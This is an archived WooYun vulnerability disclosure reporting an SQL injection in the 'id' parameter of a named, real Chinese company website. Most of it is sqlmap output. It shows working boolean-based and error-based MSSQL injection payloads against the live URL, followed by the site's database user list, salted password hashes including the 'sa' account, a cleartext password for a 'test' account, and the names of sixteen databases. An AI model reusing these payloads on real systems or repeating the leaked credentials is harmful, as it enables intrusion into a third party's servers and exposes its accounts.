乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-19: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://www.gesafe.com/xintuo/xt_GongSi.aspx?id=31
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=31' AND 8138=8138 AND 'LiwH'='LiwH Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=31' AND 2567=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2567=2567) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(101)+CHAR(116)+CHAR(114)+CHAR(113))) AND 'fsBi'='fsBi---[17:35:56] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NETback-end DBMS: Microsoft SQL Server 2008
database management system users [4]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] sa[*] test
database management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x010017ed4b0c9b7accf20be423f9555b402ee2acc6d9e5957895 header: 0x0100 salt: 17ed4b0c mixedcase: 9b7accf20be423f9555b402ee2acc6d9e5957895[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x0100cc22b096b6010bc8784bbdb412c24fe89092ef31494ff0ee header: 0x0100 salt: cc22b096 mixedcase: b6010bc8784bbdb412c24fe89092ef31494ff0ee[*] sa [1]: password hash: 0x01001f574bf01c4397709a91718d8ac5d8e48b1d419e771ac713 header: 0x0100 salt: 1f574bf0 mixedcase: 1c4397709a91718d8ac5d8e48b1d419e771ac713[*] test [1]: password hash: 0x0100a29ea011c44f6decf6e2f71980b876bba7cc95f741534be5 header: 0x0100 salt: a29ea011 mixedcase: c44f6decf6e2f71980b876bba7cc95f741534be5 clear-text password: 123456
available databases [16]:[*] aigeshang[*] aomei[*] beijing[*] fangyimeieasy[*] Gs_simu_Online[*] HouZe_DiChan[*] HZ_XieZiLou[*] LiangJiaoLuo[*] master[*] model[*] msdb[*] Project_Online[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] test
未能联系到厂商或者厂商积极拒绝